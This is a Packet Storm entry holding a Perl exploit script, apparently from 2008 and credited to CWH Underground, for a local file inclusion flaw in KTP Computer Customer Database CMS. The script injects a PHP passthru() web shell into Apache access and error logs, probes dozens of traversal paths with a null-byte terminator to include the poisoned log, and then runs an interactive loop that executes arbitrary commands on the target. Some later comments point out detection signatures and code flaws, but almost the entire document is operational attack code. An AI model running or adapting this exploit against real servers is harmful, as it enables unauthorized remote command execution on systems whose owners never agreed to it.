ktpccd-lfi.txt

2008-11-30T00:00:00
ID PACKETSTORM:72453
Type packetstorm
Reporter CWH Underground
Modified 2008-11-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
#======================================  
# KTPCCD Local File Inclusion Exploit  
#======================================  
#  
# ,--^----------,--------,-----,-------^--,  
# | ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
# `+---------------------------^----------|  
# `\_,-------, _________________________|  
# / XXXXXX /`| /  
# / XXXXXX / `\ /  
# / XXXXXX /\______(  
# / XXXXXX /   
# / XXXXXX /  
# (________(   
# `------'  
#  
#AUTHOR : CWH Underground  
#DATE : 30 November 2008  
#SITE : cwh.citec.us  
#  
#  
#####################################################  
#APPLICATION : KTP Computer Customer Database CMS  
#VERSION : 1  
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip  
######################################################  
#Note: magic_quotes_gpc = off  
#Vulnerability in Local File Inclusion  
#Wrote Exploit for Local File Inclusion <-> Remote Command Execution  
#######################################################################################  
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK  
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com  
#######################################################################################  
  
  
use LWP::UserAgent;  
use IO::Socket;  
use LWP::Simple;  
  
# Candidate web-server log locations, expressed as directory-traversal paths
# relative to the vulnerable script.  The probe loop further down appends each
# entry to the `p` parameter and checks whether the marker injected earlier is
# echoed back, i.e. whether the application includes that file.  $log starts
# as "../" and is only overwritten by a matching candidate; if nothing matches
# the command loop still runs, requesting "../%00".
$log="../";  
@apache=(  
"../../../../../var/log/httpd/access_log",  
"../../../../../var/log/httpd/error_log",  
"../apache/logs/error.log",  
"../apache/logs/access.log",  
"../../apache/logs/error.log",  
"../../apache/logs/access.log",  
"../../../apache/logs/error.log",  
"../../../apache/logs/access.log",  
"../../../../apache/logs/error.log",  
"../../../../apache/logs/access.log",  
"../../../../../apache/logs/error.log",  
"../../../../../apache/logs/access.log",  
"../logs/error.log",  
"../logs/access.log",  
"../../logs/error.log",  
"../../logs/access.log",  
"../../../logs/error.log",  
"../../../logs/access.log",  
"../../../../logs/error.log",  
"../../../../logs/access.log",  
"../../../../../logs/error.log",  
"../../../../../logs/access.log",  
"../../../../../etc/httpd/logs/access_log",  
"../../../../../etc/httpd/logs/access.log",  
"../../../../../etc/httpd/logs/error_log",  
"../../../../../etc/httpd/logs/error.log",  
"../../.. /../../var/www/logs/access_log",  # NOTE: stray space inside the path; this entry can never resolve  
"../../../../../var/www/logs/access.log",  
"../../../../../usr/local/apache/logs/access_log",  
"../../../../../usr/local/apache/logs/access.log",  
"../../../../../var/log/apache/access_log",  
"../../../../../var/log/apache/access.log",  
"../../../../../var/log/access_log",  
"../../../../../var/www/logs/error_log",  
"../../../../../var/www/logs/error.log",  
"../../../../../usr/local/apache/logs/error_log",  
"../../../../../usr/local/apache/logs/error.log",  
"../../../../../var/log/apache/error_log",  
"../../../../../var/log/apache/error.log",  
"../../../../../var/log/access_log",  
"../../../../../var/log/error_log"  
);  
  
# Clear the terminal.  `system` receives a fixed literal command with no user
# input, so the shell invocation here is benign.  $sis is declared with `my`
# at file scope here and re-declared twice further down; under -w the later
# declarations warn that they mask this one.
my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }  
  
# Banner only; no network activity happens before the argument check.
print "\n==============================================\n";  
print " KTP Computer Customer Database \n";  
print " Remote Command Execution Exploit \n";  
print " Discovered By CWH Underground \n";  
print "==============================================\n";  
print " \n";  
print " ,--^----------,--------,-----,-------^--, \n";  
print " | ||||||||| `--------' | O \n";  
print " `+---------------------------^----------| \n";  
print " `\_,-------, _________________________| \n";  
print " / XXXXXX /`| / \n";  
print " / XXXXXX / `\ / \n";  
print " / XXXXXX /\______( \n";  
print " / XXXXXX / \n";  
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";  
print " (________( \n";  
print " `------' \n";  
print " \n";  
  
  
  
# Argument check.  The usage text is printed when fewer than two arguments are
# supplied, but nothing exits, so execution continues with undefined $host and
# $path (both package globals -- the file has no `use strict`).
if (@ARGV < 2)  
{  
print "Usage: ./xpl.pl <Host> <Path>\n";  
print "Ex. ./xpl.pl www.hackme.com /ktp\n";  
  
}  
  
$host=$ARGV[0];  
$path=$ARGV[1];  
  
  
# Strip a leading scheme so $host can be used as a raw TCP peer address.
if ( $host =~ /^http:/ ) {$host =~ s/http:\/\///g;}  
  
print "\nTrying to Inject the Code...\n";  
  
# Log-poisoning step.  A PHP tag is placed in the request line of a hand-built
# HTTP request so that the web server records it verbatim in its access or
# error log; "/cwhunderground" in the same request line is the marker that the
# probe loop below searches for.  This is plain TCP to a hard-coded port 80,
# and the socket is closed without reading the response.  From the defender's
# side this step is self-incriminating: a request line containing "<?" or
# "passthru(" lands in the very log it is meant to poison, which makes it a
# straightforward log-monitoring signature.
$CODE="<? passthru(\$_GET[cmd]) ?>";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";  
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Connection: close\r\n\r\n";  
close($socket);  
  
# Re-add the scheme: from here on $host is used as a URL prefix for LWP.
if ( $host !~ /^http:/ ) {$host = "http://" . $host;}  
  
# Probe each candidate log path through the vulnerable `p` parameter.  The
# trailing "%00" is a URL-encoded NUL meant to truncate whatever suffix the
# application appends to the included filename -- hence the magic_quotes_gpc
# = off requirement noted in the header (PHP 5.3.4+ additionally rejects NUL
# bytes in filesystem paths, which defeats this truncation outright).  A
# response body containing the marker means that log file was included and
# the poisoned entry was executed as PHP.  Every match overwrites $log, so the
# last matching candidate is the one used afterwards.  A fresh LWP::UserAgent
# is built per iteration and no explicit timeout is set.
foreach $getlog(@apache)  
{  
chomp($getlog);  
$find= $host.$path."/?p=".$getlog."%00";  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $find);  
$res = $xpl->request($req);  
$info = $res->content;  
if($info =~ /cwhunderground/)  
{print "\nSuccessfully injected in $getlog \n";$log=$getlog;}  
}  
  
  
# Interactive loop.  Each line read from STDIN is passed as the `cmd` query
# parameter alongside the previously located log path; the poisoned log entry
# hands it to passthru() and the response body is printed as-is.  Note the
# loop condition uses a plain string as a regex, so any input that merely
# contains "exit" (not only the word itself) ends the session.  $sis is
# re-declared with `my` at file scope here and again inside the loop, which -w
# reports as masking the earlier declaration.  Every command issued this way
# is itself recorded in the server's access log as a `cmd=` parameter next to
# the `p=` traversal string, which is the second detection point for this
# technique.
my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }  
  
chomp( $cmd = <STDIN> );  
  
while($cmd !~ "exit") {   
  
$shell= $host.$path."/?p=".$log."%00&cmd=$cmd";  
$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$req = HTTP::Request->new(GET => $shell);  
$res = $xpl->request($req);  
$info = $res->content;  
print "\n$info";  
  
  
my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }  
chomp( $cmd = <STDIN> );   
}  
  